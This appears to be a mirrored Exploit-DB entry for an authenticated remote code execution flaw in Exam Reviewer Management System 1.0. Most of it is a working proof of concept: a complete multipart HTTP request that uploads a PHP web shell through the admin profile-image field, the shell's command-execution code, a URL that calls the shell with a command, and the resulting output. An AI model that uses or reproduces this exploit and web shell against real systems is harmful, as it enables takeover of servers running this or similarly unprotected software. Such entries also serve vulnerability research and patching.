bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50726.txt
Offensive Security c86e2ee727 DB: 2022-02-10 
3 changes to exploits/shellcodes

Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
AtomCMS v2.0 - SQLi
2022-02-10 05:02:00 +00:00

144 lines
No EOL
2.4 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-02-08
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage:
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: XAMPP, Kali Linux
Description The application suffers from a remote code execution in the
admin panel. An authenticated attacker can upload a web-shell php file in
profile page to achieve remote code execution.
POC:-
==========
# Request:
==========
POST /erms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------37791356766765055891341961306
Content-Length: 1004
Origin: http://localhost
Connection: close
Referer: http://localhost/erms/admin/?page=user
Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="id"
1
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="firstname"
Adminstrator
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="lastname"
Admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="username"
admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="password"
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<b>Remote code execution: </b><br><pre>
<?php if(isset($_REQUEST['cmd'])){ echo
"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
</pre>
</body>
</html>
-----------------------------37791356766765055891341961306—
================
# Webshell access:
================
# Webshell access via:
POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
# Webshell response:
Remote code execution:
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Reference in a new issue View git blame Copy permalink